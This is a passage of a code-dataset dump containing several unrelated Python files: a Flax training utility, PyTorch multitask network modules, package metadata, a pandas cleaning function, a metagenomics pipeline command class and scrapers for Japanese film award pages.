cv2.waitKey(0)\n","repo_name":"LuZWCHA/MyLibs","sub_path":"nowandfuture/utils_medical/demons.py","file_name":"demons.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31038154673","text":"import functools\nimport math\nimport os\nimport time\nfrom typing import Callable, Dict, Tuple\n\nfrom absl import flags\nfrom absl import logging\n\nimport flax\nfrom flax import jax_utils\nfrom flax import optim\nfrom flax.metrics import tensorboard\nfrom flax.training import checkpoints\nfrom flax.training import common_utils\nfrom flax.training import lr_schedule\nimport jax\nimport jax.numpy as jnp\n\nimport tensorflow as tf\nfrom tensorflow.io import gfile\n\n\nFLAGS = flags.FLAGS\n\n\n# Training hyper-parameters\nflags.DEFINE_float('gradient_clipping', 5.0, 'Gradient clipping.')\nflags.DEFINE_float('learning_rate', 0.1, 'Initial learning rate.')\nflags.DEFINE_bool('use_learning_rate_schedule', True,\n 'Whether to use a cosine schedule or keep the learning rate '\n 'constant. Training on cifar should always use the schedule '\n ', this flag is mostly for testing purpose.')\nflags.DEFINE_float('weight_decay', 0.001, 'Weight decay coefficient.')\nflags.DEFINE_integer('run_seed', 0,\n 'Seed to use to generate pseudo random number during '\n 'training (for dropout for instance). Has no influence on '\n 'the dataset shuffling.')\n\n# Additional flags that don't affect the model.\nflags.DEFINE_integer('save_progress_seconds', 3600, 'Save progress every...s')\nflags.DEFINE_multi_integer(\n 'additional_checkpoints_at_epochs', [],\n 'Additional epochs when we should save the model for later analysis. '\n 'No matter the value of this flag, the most recent version of the model '\n 'will be saved regularly to resume training if needed.')\nflags.DEFINE_bool('also_eval_on_training_set', False,\n 'If set to true, the model will also be evaluated on the '\n '(non-augmented) training set at the end of each epoch.')\n\n\ndef restore_checkpoint(\n optimizer,\n model_state,\n directory):\n \"\"\"Restores a model and its state from a given checkpoint.\n If several checkpoints are saved in the checkpoint directory, the latest one\n will be loaded (based on the `epoch`).\n Args:\n optimizer: The optimizer containing the model that we are training.\n model_state: Current state associated with the model.\n directory: Directory where the checkpoints should be saved.\n Returns:\n The restored optimizer and model state, along with the number of epochs the\n model was trained for.\n \"\"\"\n train_state = dict(optimizer=optimizer, model_state=model_state, epoch=0)\n restored_state = checkpoints.restore_checkpoint(directory, train_state)\n return (restored_state['optimizer'],\n restored_state['model_state'],\n restored_state['epoch'])\n\n\ndef save_checkpoint(optimizer,\n model_state,\n directory,\n epoch):\n \"\"\"Saves a model and its state.\n Removes a checkpoint if it already exists for a given epoch.\n Args:\n optimizer: The optimizer containing the model that we are training.\n model_state: Current state associated with the model.\n directory: Directory where the checkpoints should be saved.\n epoch: Number of epochs the model has been trained for.\n \"\"\"\n train_state = dict(optimizer=optimizer,\n model_state=model_state,\n epoch=epoch)\n if gfile.exists(os.path.join(directory, 'checkpoint_' + str(epoch))):\n gfile.remove(os.path.join(directory, 'checkpoint_' + str(epoch)))\n checkpoints.save_checkpoint(directory, train_state, epoch, keep=2)\n\n\ndef create_optimizer(model,\n learning_rate,\n beta = 0.9):\n \"\"\"Creates an SGD (Nesterov momentum) optimizer.\n Learning rate will be ignored when using a learning rate schedule.\n Args:\n model: The FLAX model to optimize.\n learning_rate: Learning rate for the gradient descent.\n beta: Momentum parameter.\n Returns:\n A SGD optimizer that targets the model.\n \"\"\"\n optimizer_def = optim.Momentum(learning_rate=learning_rate,\n beta=beta,\n nesterov=True)\n optimizer = optimizer_def.create(model)\n return optimizer\n\n\ndef cross_entropy_loss(logits,\n one_hot_labels):\n \"\"\"Returns the cross entropy loss between some logits and some labels.\n Args:\n logits: Output of the model.\n one_hot_labels: One-hot encoded labels. Dimensions should match the logits.\n Returns:\n The cross entropy, averaged over the first dimension (samples).\n \"\"\"\n log_softmax_logits = jax.nn.log_softmax(logits)\n return -jnp.sum(one_hot_labels * log_softmax_logits) / one_hot_labels.shape[0]\n\n\ndef error_rate_metric(logits,\n one_hot_labels):\n \"\"\"Returns the error rate between some predictions and some labels.\n Args:\n logits: Output of the model.\n one_hot_labels: One-hot encoded labels. Dimensions should match the logits.\n Returns:\n The error rate (1 - accuracy), averaged over the first dimension (samples).\n \"\"\"\n return jnp.mean(jnp.argmax(logits, -1) != jnp.argmax(one_hot_labels, -1))\n\n\ndef tensorflow_to_numpy(xs):\n \"\"\"Converts a tree of tensorflow tensors to numpy arrays.\n Args:\n xs: A pytree (such as nested tuples, lists, and dicts) where the leaves are\n tensorflow tensors.\n Returns:\n A pytree with the same structure as xs, where the leaves have been converted\n to jax numpy ndarrays.\n \"\"\"\n # Use _numpy() for zero-copy conversion between TF and NumPy.\n return jax.tree_map(lambda x: x._numpy(), xs) # pylint: disable=protected-access\n\n\ndef shard_batch(xs):\n \"\"\"Shards a batch across all available replicas.\n Assumes that the number of samples (first dimension of xs) is divisible by the\n number of available replicas.\n Args:\n xs: A pytree (such as nested tuples, lists, and dicts) where the leaves are\n numpy ndarrays.\n Returns:\n A pytree with the same structure as xs, where the leaves where added a\n leading dimension representing the replica the tensor is on.\n \"\"\"\n local_device_count = jax.local_device_count()\n def _prepare(x):\n return x.reshape((local_device_count, -1) + x.shape[1:])\n return jax.tree_map(_prepare, xs)\n\n\ndef load_and_shard_tf_batch(xs):\n \"\"\"Converts to numpy arrays and distribute a tensorflow batch.\n Args:\n xs: A pytree (such as nested tuples, lists, and dicts) where the leaves are\n tensorflow tensors.\n Returns:\n A pytree of numpy ndarrays with the same structure as xs, where the leaves\n where added a leading dimension representing the replica the tensor is on.\n \"\"\"\n return shard_batch(tensorflow_to_numpy(xs))\n\n\ndef get_cosine_schedule(num_epochs, learning_rate,\n num_training_obs,\n batch_size):\n \"\"\"Returns a cosine learning rate schedule, without warm up.\n Args:\n num_epochs: Number of epochs the model will be trained for.\n learning_rate: Initial learning rate.\n num_training_obs: Number of training observations.\n batch_size: Total batch size (number of samples seen per gradient step).\n Returns:\n A function that takes as input the current step and returns the learning\n rate to use.\n \"\"\"\n steps_per_epoch = int(math.floor(num_training_obs / batch_size))\n learning_rate_fn = lr_schedule.create_cosine_learning_rate_schedule(\n learning_rate, steps_per_epoch, num_epochs)\n return learning_rate_fn\n\n\ndef global_norm(updates):\n \"\"\"Returns the l2 norm of the input.\n Args:\n updates: A pytree of ndarrays representing the gradient.\n \"\"\"\n return jnp.sqrt(\n sum([jnp.sum(jnp.square(x)) for x in jax.tree_leaves(updates)]))\n\n\ndef clip_by_global_norm(updates):\n \"\"\"Clips the gradient by global norm.\n Will have no effect if FLAGS.gradient_clipping is set to zero (no clipping).\n Args:\n updates: A pytree of numpy ndarray representing the gradient.\n Returns:\n The gradient clipped by global norm.\n \"\"\"\n if FLAGS.gradient_clipping > 0:\n g_norm = global_norm(updates)\n trigger = g_norm < FLAGS.gradient_clipping\n updates = jax.tree_multimap(\n lambda t: jnp.where(trigger, t, (t / g_norm) * FLAGS.gradient_clipping),\n updates)\n return updates\n\n\ndef train_step(\n optimizer,\n state,\n batch,\n prng_key,\n learning_rate_fn,\n l2_reg\n):\n \"\"\"Performs one gradient step.\n Args:\n optimizer: The optimizer targeting the model to train.\n state: Current state associated with the model (contains the batch norm MA).\n batch: Batch on which the gradient should be computed. Must have an `image`\n and `label` key.\n prng_key: A PRNG key to use for stochasticity for this gradient step (e.g.\n for sampling an eventual dropout mask).\n learning_rate_fn: Function that takes the current step as input and return\n the learning rate to use.\n l2_reg: Weight decay parameter. The total weight decay penaly added to the\n loss is equal to 0.5 * l2_reg * sum_i ||w_i||_2^2 where the sum is over\n all trainable parameters of the model (bias and batch norm parameters\n included).\n Returns:\n The updated optimizer (that includes the model), the updated state and\n a dictionary containing the training loss and error rate on the batch.\n \"\"\"\n\n def forward_and_loss(model):\n \"\"\"Returns the model's loss, updated state and predictions.\n Args:\n model: The model that we are training.\n \"\"\"\n with flax.nn.stateful(state) as new_state:\n with flax.nn.stochastic(prng_key):\n logits = model(batch['image'], train=True)\n loss = cross_entropy_loss(logits, batch['label'])\n # We apply weight decay to all parameters, including bias and batch norm\n # parameters.\n weight_penalty_params = jax.tree_leaves(model.params)\n weight_l2 = sum([jnp.sum(x ** 2) for x in weight_penalty_params])\n weight_penalty = l2_reg * 0.5 * weight_l2\n loss = loss + weight_penalty\n return loss, (new_state, logits)\n\n step = optimizer.state.step\n lr = learning_rate_fn(step)\n grad_fn = jax.value_and_grad(forward_and_loss, has_aux=True)\n (_, (new_state, logits)), grad = grad_fn(optimizer.target)\n\n # We synchronize the gradients across replicas by averaging them.\n grad = jax.lax.pmean(grad, 'batch')\n\n # Gradient is clipped after being synchronized.\n grad = clip_by_global_norm(grad)\n new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr)\n\n # Compute some metrics to monitor the training.\n metrics = {'train_error_rate': error_rate_metric(logits, batch['label']),\n 'train_loss': cross_entropy_loss(logits, batch['label'])}\n\n return new_optimizer, new_state, metrics, lr\n\n\n# Shorthand notation for typing the function defined above.\n# We omit the weight decay and learning rate arguments as they will be\n# passed before we pmap the function.\n_TrainStep = Callable[[\n flax.nn.Model, # model.\n flax.nn.Collection, # state.\n Dict[str, jnp.ndarray], # batch.\n jnp.ndarray # PRNG key\n], Tuple[flax.optim.Optimizer, flax.nn.Collection, Dict[str, float], # metrics.\n jnp.ndarray # learning rate.\n ]]\n\n\ndef eval_step(model, state,\n batch):\n \"\"\"Evaluates the model on a single batch.\n Args:\n model: The model to evaluate.\n state: Current state associated with the model (contains the batch norm MA).\n batch: Batch on which the model should be evaluated. Must have an `image`\n and `label` key.\n Returns:\n A dictionary containing the loss and error rate on the batch. These metrics\n are summed over the samples (and not averaged).\n \"\"\"\n\n # Averages the batch norm moving averages.\n state = jax.lax.pmean(state, 'batch')\n with flax.nn.stateful(state, mutable=False):\n logits = model(batch['image'], train=False)\n\n # Because we don't have a guarantee that all batches contains the same number\n # of samples, we can't average the metrics per batch and then average the\n # resulting values. To compute the metrics correctly, we sum them (error rate\n # and cross entropy returns means, thus we multiply by the number of samples),\n # and finally sum across replicas. These sums will be divided by the total\n # number of samples outside of this function.\n num_samples = batch['image'].shape[0]\n metrics = {\n 'error_rate':\n error_rate_metric(logits, batch['label']) * num_samples,\n 'loss':\n cross_entropy_loss(logits, batch['label']) * num_samples\n }\n metrics = jax.lax.psum(metrics, 'batch')\n return metrics\n\n\n# Shorthand notation for typing the function defined above.\n_EvalStep = Callable[\n [flax.nn.Model, flax.nn.Collection, Dict[str, jnp.ndarray]],\n Dict[str, float]]\n\n\ndef eval_on_dataset(\n model, state, dataset,\n pmapped_eval_step):\n \"\"\"Evaluates the model on the whole dataset.\n Args:\n model: The model to evaluate.\n state: Current state associated with the model (contains the batch norm MA).\n dataset: Dataset on which the model should be evaluated. Should already\n being batched.\n pmapped_eval_step: A pmapped version of the `eval_step` function (see its\n documentation for more details).\n Returns:\n A dictionary containing the loss and error rate on the batch. These metrics\n are averaged over the samples.\n \"\"\"\n eval_metrics = []\n total_num_samples = 0\n for eval_batch in dataset:\n # Load and shard the TF batch.\n eval_batch = load_and_shard_tf_batch(eval_batch)\n # Compute metrics and sum over all observations in the batch.\n metrics = pmapped_eval_step(model, state, eval_batch)\n eval_metrics.append(metrics)\n # Number of samples seen in num_replicas * per_replica_batch_size.\n total_num_samples += (\n eval_batch['label'].shape[0] * eval_batch['label'].shape[1])\n # Metrics are all the same across all replicas (since we applied psum in the\n # eval_step). The next line will fetch the metrics on one of them.\n eval_metrics = common_utils.get_metrics(eval_metrics)\n # Finally, we divide by the number of samples to get the mean error rate and\n # cross entropy.\n eval_summary = jax.tree_map(lambda x: x.sum() / total_num_samples,\n eval_metrics)\n return eval_summary\n\n\ndef train_for_one_epoch(\n dataset_source,\n optimizer, state,\n prng_key, pmapped_train_step,\n summary_writer\n):\n \"\"\"Trains the model for one epoch.\n Args:\n dataset_source: Container for the training dataset.\n optimizer: The optimizer targeting the model to train.\n state: Current state associated with the model (contains the batch norm MA).\n prng_key: A PRNG key to use for stochasticity (e.g. for sampling an eventual\n dropout mask). Is not used for shuffling the dataset.\n pmapped_train_step: A pmapped version of the `train_step` function (see its\n documentation for more details).\n summary_writer: A Tensorboard SummaryWriter to use to log metrics.\n Returns:\n The updated optimizer (with the associated updated model), state and PRNG\n key.\n \"\"\"\n train_metrics = []\n for batch in dataset_source.get_train(use_augmentations=True):\n # Generate a PRNG key that will be rolled into the batch.\n step_key, prng_key = jax.random.split(prng_key)\n # Load and shard the TF batch.\n batch = tensorflow_to_numpy(batch)\n batch = shard_batch(batch)\n # Shard the step PRNG key.\n sharded_keys = common_utils.shard_prng_key(step_key)\n\n optimizer, state, metrics, lr = pmapped_train_step(\n optimizer, state, batch, sharded_keys)\n train_metrics.append(metrics)\n train_metrics = common_utils.get_metrics(train_metrics)\n # Get training epoch summary for logging.\n train_summary = jax.tree_map(lambda x: x.mean(), train_metrics)\n train_summary['learning_rate'] = lr[0]\n current_step = int(optimizer.state.step[0])\n for metric_name, metric_value in train_summary.items():\n summary_writer.scalar(metric_name, metric_value, current_step)\n summary_writer.flush()\n return optimizer, state, prng_key\n\n\ndef train(optimizer,\n state,\n dataset_source,\n training_dir, num_epochs):\n \"\"\"Trains the model.\n Args:\n optimizer: The optimizer targeting the model to train.\n state: Current state associated with the model (contains the batch norm MA).\n dataset_source: Container for the training dataset.\n training_dir: Parent directory where the tensorboard logs and model\n checkpoints should be saved.\n num_epochs: Number of epochs for which we want to train the model.\n \"\"\"\n checkpoint_dir = os.path.join(training_dir, 'checkpoints')\n summary_writer = tensorboard.SummaryWriter(training_dir)\n prng_key = jax.random.PRNGKey(FLAGS.run_seed)\n\n optimizer = jax_utils.replicate(optimizer)\n state = jax_utils.replicate(state)\n\n if FLAGS.use_learning_rate_schedule:\n learning_rate_fn = get_cosine_schedule(num_epochs, FLAGS.learning_rate,\n dataset_source.num_training_obs,\n dataset_source.batch_size)\n else:\n learning_rate_fn = lambda step: FLAGS.learning_rate\n\n # pmap the training and evaluation functions.\n pmapped_train_step = jax.pmap(\n functools.partial(\n train_step,\n learning_rate_fn=learning_rate_fn,\n l2_reg=FLAGS.weight_decay),\n axis_name='batch')\n pmapped_eval_step = jax.pmap(eval_step, axis_name='batch')\n\n # Log initial results:\n if gfile.exists(checkpoint_dir):\n optimizer, state, epoch_last_checkpoint = restore_checkpoint(\n optimizer, state, checkpoint_dir)\n # If last checkpoint was saved at the end of epoch n, then the first\n # training epochs to do when we resume training is n+1.\n initial_epoch = epoch_last_checkpoint + 1\n info = 'Resuming training from epoch {}'.format(initial_epoch)\n logging.info(info)\n else:\n initial_epoch = 0\n logging.info('Starting training from scratch.')\n\n time_at_last_checkpoint = time.time()\n for epochs_id in range(initial_epoch, num_epochs):\n if epochs_id in FLAGS.additional_checkpoints_at_epochs:\n # To save additional checkpoints that will not be erase by later version,\n # we save them in a new directory.\n c_path = os.path.join(checkpoint_dir, 'additional_ckpt_' + str(epochs_id))\n save_checkpoint(optimizer, state, c_path, epochs_id)\n tick = time.time()\n optimizer, state, prng_key = train_for_one_epoch(dataset_source, optimizer,\n state, prng_key,\n pmapped_train_step,\n summary_writer)\n tock = time.time()\n info = 'Epoch {} finished in {:.2f}s.'.format(epochs_id, tock - tick)\n logging.info(info)\n\n # Evaluate the model on the test set, and optionally the training set.\n tick = time.time()\n current_step = int(optimizer.state.step[0])\n if FLAGS.also_eval_on_training_set:\n train_ds = dataset_source.get_train(use_augmentations=False)\n train_metrics = eval_on_dataset(\n optimizer.target, state, train_ds, pmapped_eval_step)\n for metric_name, metric_value in train_metrics.items():\n summary_writer.scalar('eval_on_train_' + metric_name,\n metric_value, current_step)\n summary_writer.flush()\n test_ds = dataset_source.get_test()\n test_metrics = eval_on_dataset(\n optimizer.target, state, test_ds, pmapped_eval_step)\n for metric_name, metric_value in test_metrics.items():\n summary_writer.scalar('test_' + metric_name,\n metric_value, current_step)\n summary_writer.flush()\n tock = time.time()\n info = 'Evaluated model in {:.2f}.'.format(tock - tick)\n logging.info(info)\n\n # Save new checkpoint if the last one was saved more than\n # `save_progress_seconds` seconds ago.\n sec_from_last_ckpt = time.time() - time_at_last_checkpoint\n if sec_from_last_ckpt > FLAGS.save_progress_seconds:\n save_checkpoint(optimizer, state, checkpoint_dir, epochs_id)\n time_at_last_checkpoint = time.time()\n logging.info('Saved checkpoint.')\n\n # Always save final checkpoint\n save_checkpoint(optimizer, state, checkpoint_dir, epochs_id)","repo_name":"vballoli/vit-flax","sub_path":"examples/train/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":20113,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"37630583406","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"\nFully-connected Neural network\n\"\"\"\n\nimport torch\nfrom torch import nn\n\nfrom pyepo.func import SPOPlus, perturbedFenchelYoung\n\n\nclass reg(nn.Module):\n \"\"\"\n Linear layer model with softplus\n \"\"\"\n def __init__(self, p, m):\n super(reg, self).__init__()\n self.linear = nn.Linear(p, m*(m-1)//2)\n self.softp = nn.Softplus(threshold=5)\n\n def forward(self, x):\n h = self.linear(x)\n out = self.softp(h)\n return out\n\n\nclass fcNet(nn.Module):\n \"\"\"\n Full-connected prediction model\n \"\"\"\n def __init__(self, p, m):\n super(fcNet, self).__init__()\n # layers\n self.fc1 = nn.Linear(p, 64)\n self.relu = nn.ReLU()\n self.fc2 = nn.Linear(64, m*(m-1)//2)\n self.softp = nn.Softplus(threshold=5)\n\n def forward(self, x):\n h = self.fc1(x)\n h = self.relu(h)\n h = self.fc2(h)\n out = self.softp(h)\n return out\n\n\nclass mtlSPO(nn.Module):\n \"\"\"\n Multitask with SPO+ loss\n \"\"\"\n def __init__(self, net, solvers, processes=1, mse=False):\n super(mtlSPO, self).__init__()\n # layers\n self.net = net\n # init SPO+ loss\n self.spop = nn.ModuleList([])\n for solver in solvers:\n self.spop.append(SPOPlus(solver, processes=processes))\n # mse flag\n self.mse = mse\n self.l2 = nn.MSELoss()\n\n def forward(self, x, c, w, z):\n cp = self.net(x)\n # compute loss\n loss = []\n for i, spop in enumerate(self.spop):\n # spo+\n loss.append(spop(cp, c, w[:,i], z[:,i]).mean())\n # mse\n if self.mse:\n loss.append(self.l2(c, cp))\n return torch.stack(loss)\n\n\nclass mtlPFYL(nn.Module):\n \"\"\"\n Multitask with perturbed Fenchel-Young loss\n \"\"\"\n def __init__(self, net, solvers, n_samples=1, epsilon=1.0, processes=1):\n super(mtlPFYL, self).__init__()\n # layers\n self.net = net\n # init SPO+ loss\n self.pfyl = nn.ModuleList([])\n for solver in solvers:\n self.pfyl.append(perturbedFenchelYoung(solver, n_samples=n_samples, epsilon=epsilon, processes=processes))\n\n def forward(self, x, c, w, z):\n cp = self.net(x)\n # compute loss\n loss = []\n for i, pfyl in enumerate(self.pfyl):\n # spo+\n loss.append(pfyl(cp, w[:,i]).mean())\n return torch.stack(loss)\n","repo_name":"khalil-research/Multi-Task_Predict-then-Optimize","sub_path":"net/fcnet.py","file_name":"fcnet.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"10297902284","text":"# -*- coding: utf-8 -*-\n\"\"\"Project metadata\n\nIntroduction to graphical probability models by building them\n\"\"\"\n\n# The package name, which is also the \"UNIX name\" for the project.\npackage = 'intgraph'\nproject = \"Introduction to Probabilistic Graphical Models\"\nproject_no_spaces = project.replace(' ', '')\nversion = '0.1'\ndescription = 'Includes implementations for Markov Random Fields, Bayes nets, and Markov Logic Networks'\nauthors = ['Thomas Chen']\nauthors_string = ', '.join(authors)\nemails = ['foxnewsnetwork@gmail.com']\nlicense = 'MIT'\ncopyright = '2019 ' + authors_string\nurl = 'http://github.com/foxnewsnetwork/sandbox-machine/tree/master/packages/ailang'\n","repo_name":"foxnewsnetwork/sandbox-machine","sub_path":"packages/intgraph/intgraph/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35967496199","text":"import pandas as pd\n\n\ndef clean_data(df):\n \"\"\"\n\n :param df:\n :return:\n \"\"\"\n \"\"\"\n - Cleans the combined dataframe for use by ML model\n\n Args:\n df pandas_dataframe: Merged dataframe returned from load_data() function\n\n Returns:\n df pandas_dataframe: Cleaned data to be used by ML model\n \"\"\"\n\n # Split categories into separate category columns\n categories = df['categories'].str.split(\";\", \\\n expand=True)\n\n # select the first row of the categories dataframe\n row = categories.iloc[0, :].values\n\n # use this row to extract a list of new column names for categories.\n new_cols = [r[:-2] for r in row]\n\n # rename the columns of `categories`\n categories.columns = new_cols\n\n # Convert category values to just numbers 0 or 1.\n for column in categories:\n # set each value to be the last character of the string\n categories[column] = categories[column].str[-1]\n\n # convert column from string to numeric\n categories[column] = pd.to_numeric(categories[column])\n\n # drop the original categories column from `df`\n df.drop('categories', axis=1, inplace=True)\n\n # concatenate the original dataframe with the new `categories` dataframe\n df[categories.columns] = categories\n\n # drop duplicates\n df.drop_duplicates(inplace=True)\n\n return df\n","repo_name":"Brannnny/Disaster-Response-Model","sub_path":"FE/utils/transformation.py","file_name":"transformation.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22768736820","text":"import itertools\nfrom os.path import abspath\n\nfrom metagenomix._io_utils import compute_hash\nfrom metagenomix._inputs import show_inputs\nfrom metagenomix.softwares.alignment import *\nfrom metagenomix.softwares.annotation import *\nfrom metagenomix.softwares.args import *\nfrom metagenomix.softwares.assembly import *\nfrom metagenomix.softwares.binning import *\nfrom metagenomix.softwares.metamarker import *\nfrom metagenomix.softwares.genomics import *\nfrom metagenomix.softwares.phlans import *\nfrom metagenomix.softwares.plasmids import *\nfrom metagenomix.softwares.pooling import pooling\nfrom metagenomix.softwares.preprocess import *\nfrom metagenomix.softwares.profiling import *\nfrom metagenomix.softwares.midas2 import *\nfrom metagenomix.softwares.simka import *\nfrom metagenomix.softwares.strains import *\nfrom metagenomix.softwares.viruses import *\nfrom metagenomix.softwares.mapping import *\nfrom metagenomix.softwares.anvio import *\nfrom metagenomix.softwares.squeezemeta import *\n\n\nclass Commands(object):\n\n def __init__(self, config, databases, workflow):\n self.config = config\n self.databases = databases\n self.graph = workflow.graph\n self.pipeline = workflow.workflow\n self.hashes = workflow.hashes\n self.softs = workflow.softs\n self.outputs = {}\n self.cmds = {}\n self.args = {}\n self.pools = {}\n self.longs = None\n self.inputs = None\n self.method = None\n self.soft = None\n self.sam_pool = None\n self.dir = ''\n self.path = []\n self.status = {}\n self.links = {}\n self.links_stats = {}\n self.holistics = {\n 'simka',\n 'quast',\n 'qiita_wol',\n 'mag_data',\n 'metamarker',\n 'woltka',\n 'drep',\n 'strainphlan',\n 'midas2_merge'\n }\n\n def collect(self):\n for sdx, (name, paths) in enumerate(self.graph.paths.items()):\n print(' [%s] %s' % (sdx, name))\n for path in paths:\n self.path = path\n hashed = self.hashes[tuple(path)]\n self.soft = self.softs[name][hashed]\n if self.config.verbose:\n print(' %s > %s' % (' ' * len(str(sdx)), hashed))\n self.get_inputs() # Update self.inputs to previous output\n self.get_dir()\n self.make_holistic()\n self.generic_command()\n self.show_messages()\n\n def get_inputs(self):\n \"\"\"Update the `inputs` attribute of the software object.\"\"\"\n if self.soft.prev == 'None':\n # if running on raw data: use the fastq files (possibly on scratch)\n self.inputs = self.config.fastq\n if self.soft.params['scratch'] and self.config.jobs:\n self.inputs = self.config.fastq_mv\n else:\n # if the previous software is not None (i.e., not on the raw data)\n prev_hash = self.hashes[tuple(self.path[:-1])]\n self.inputs = self.softs[self.soft.prev][prev_hash].outputs\n show_inputs(self)\n\n def get_dir(self):\n self.dir = abspath('%s/%s/after_%s_%s' % (\n self.config.dir, self.soft.name, self.soft.prev, self.soft.hashed))\n self.soft.dir = self.dir\n if self.soft.params['scratch'] and self.config.jobs:\n self.dir = '${SCRATCH_FOLDER}%s' % self.dir\n\n def is_pool(self):\n self.struc = list\n if set(self.inputs) == set(self.pools) or self.soft.name == 'pooling':\n self.struc = dict\n\n def make_holistic(self):\n if self.soft.name in ['abritamr', 'diting']:\n if self.soft.params['samples'] == 'all':\n self.holistics.add(self.soft.name)\n\n def generic_command(self):\n self.sam_pool = ''\n self.soft.io = {}\n if self.soft.name in self.holistics:\n self.prep_job()\n elif self.soft.name == 'pooling':\n self.pooling()\n else:\n for sam_or_pool in sorted(self.inputs):\n self.sam_pool = sam_or_pool\n self.prep_job()\n self.register_command()\n\n def show_messages(self):\n for message in self.soft.messages:\n print('[%s] %s' % (self.soft.name, message))\n\n def update_dirs(self):\n self.soft.dirs.update(set([x.replace('${SCRATCH_FOLDER}/', '/')\n for x in self.outputs['dirs']]))\n\n def init_outputs(self):\n self.outputs = {'cmds': {}, 'outs': {}, 'dirs': [], 'bash': [],\n 'io': {('I', 'd'): {}, ('I', 'f'): {},\n ('O', 'd'): {}, ('O', 'f'): {}}}\n\n def init_io(self, key):\n if key not in self.soft.io:\n self.soft.io[key] = {}\n\n def fill_soft_io(self):\n for i, j in itertools.product(*[['I', 'O'], ['d', 'f']]):\n for key, io in self.outputs['io'].get((i, j), {}).items():\n self.init_io((self.sam_pool, key))\n self.soft.io[(self.sam_pool, key)][(i, j)] = io\n\n def unpack_cmds(self):\n for tech, cmds in self.outputs['cmds'].items():\n self.cmds[(self.sam_pool, tech)] = cmds\n\n def unpack_outputs(self):\n if self.soft.name in self.holistics:\n self.soft.outputs = self.outputs['outs']\n else:\n outputs = dict(x for x in self.outputs['outs'].items() if x[1])\n self.soft.outputs[self.sam_pool] = outputs\n\n def extract_data(self):\n if self.outputs.get('cmds'):\n self.unpack_cmds()\n self.fill_soft_io()\n self.unpack_outputs()\n self.soft.bash = self.outputs['bash']\n\n def prep_job(self):\n self.init_outputs() # initialize data structure collection\n self.call_method() # collect commands, outputs, io, dirs\n self.extract_data() # fill the useful self.soft attributes\n self.update_dirs()\n\n def pooling(self):\n for pool in self.config.pooling_groups:\n self.pools[pool] = {}\n self.soft.outputs[pool] = {}\n pooling(self, pool)\n\n def call_method(self):\n \"\"\"Call the command-preparing method from this class (for the\n softwares that are easy to deal with), or from auxillary modules\n located in the softwares submodules path.\"\"\"\n names = self.soft.name.split('_')\n name = names[0]\n if name in globals():\n globals()[name](self)\n else:\n raise ValueError('No method for software \"%s\"' % self.soft.name)\n\n def register_command(self):\n self.softs[self.soft.name][self.soft.hashed].cmds = dict(self.cmds)\n self.cmds = {}\n","repo_name":"FranckLejzerowicz/metagenomix","sub_path":"metagenomix/core/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":6743,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"10106328408","text":"import re\nimport requests\nimport unicodedata\nfrom abc import abstractmethod\nfrom bs4 import BeautifulSoup\nfrom nay.decorators import sort_by\nfrom nay.scraper import Scraper, Scrapable\n\n\nclass PrizeSet:\n def __init__(self):\n self._scraper = Scraper()\n\n @sort_by(lambda ds: (ds['year'], ds['name']))\n def data_set(self):\n # FIXME: Dangerous iterating over dynamic subclasses\n # TODO: ds structure is different from the original\n # See other_nominate_data.json\n self._prefetch()\n\n for cls in Prize.__subclasses__():\n yield from cls().data_set()\n\n def _prefetch(self):\n objects = [cls() for cls in Prize.__subclasses__()]\n self._scraper.get(objects)\n\n\nclass Prize(Scrapable):\n def __init__(self):\n self._content = None\n\n @abstractmethod\n def data_set(self):\n pass\n\n @property\n def name(self):\n name = type(self).__name__\n return re.sub(r'(?!^)([A-Z]+)', r'_\\1', name).lower()\n\n @property\n def content(self):\n if self._content:\n return self._content\n\n page = requests.get(self.url)\n self.set_content(page.content)\n return self._content\n\n @property\n def soup(self):\n return BeautifulSoup(self.content, 'lxml')\n\n def set_content(self, content):\n self._content = content\n\n @staticmethod\n def _uni_nfkc(text):\n return unicodedata.normalize('NFKC', text)\n\n\nclass NikkanSports(Prize):\n @property\n def url(self):\n return \"https://www.nikkansports.com/entertainment/award/ns-cinema/history/\" # noqa: E501\n\n @sort_by(lambda ds: ds['year'], uniq=True)\n def data_set(self):\n for table in self.soup.select('table.nsTable'):\n year_text = self._uni_nfkc(table.select_one('caption').text)\n title_text = self._uni_nfkc(table.select_one('tr > td').text)\n\n match = re.match(r'第\\d+回\\((\\d{4})年\\)', year_text)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': title_text,\n }\n\n\nclass GoldenGross(Prize):\n @property\n def url(self):\n return \"https://ja.wikipedia.org/wiki/ゴールデングロス賞\"\n\n @sort_by(lambda ds: ds['year'])\n def data_set(self):\n for tr in self.soup.select('table.wikitable > tbody > tr'):\n year_elm = tr.select_one('td:nth-child(1) > a')\n if not year_elm:\n continue\n\n title_elm = tr.select_one('td:nth-child(3) > a')\n if not title_elm:\n continue\n\n year_text = self._uni_nfkc(year_elm.text)\n title_text = self._uni_nfkc(title_elm.text)\n\n match = re.match(r'(\\d{4})年', year_text)\n if match:\n yield {\n 'name': self.name,\n 'year': int(match.group(1)),\n 'title': title_text,\n }\n\n\nclass HochiEigashou(Prize):\n @property\n def url(self):\n return \"https://www.hochi.co.jp/award/hochi_eigashou/history.html\"\n\n @sort_by(lambda ds: ds['year'], uniq=True)\n def data_set(self):\n for tr in self.soup.select('table.btable > tr'):\n year_elm = tr.select_one('td:nth-child(2)')\n if not year_elm:\n continue\n\n title_elm = tr.select_one('td:nth-child(3)')\n if not title_elm:\n continue\n\n yield {\n 'name': self.name,\n 'year': int(self._uni_nfkc(year_elm.text)),\n 'title': 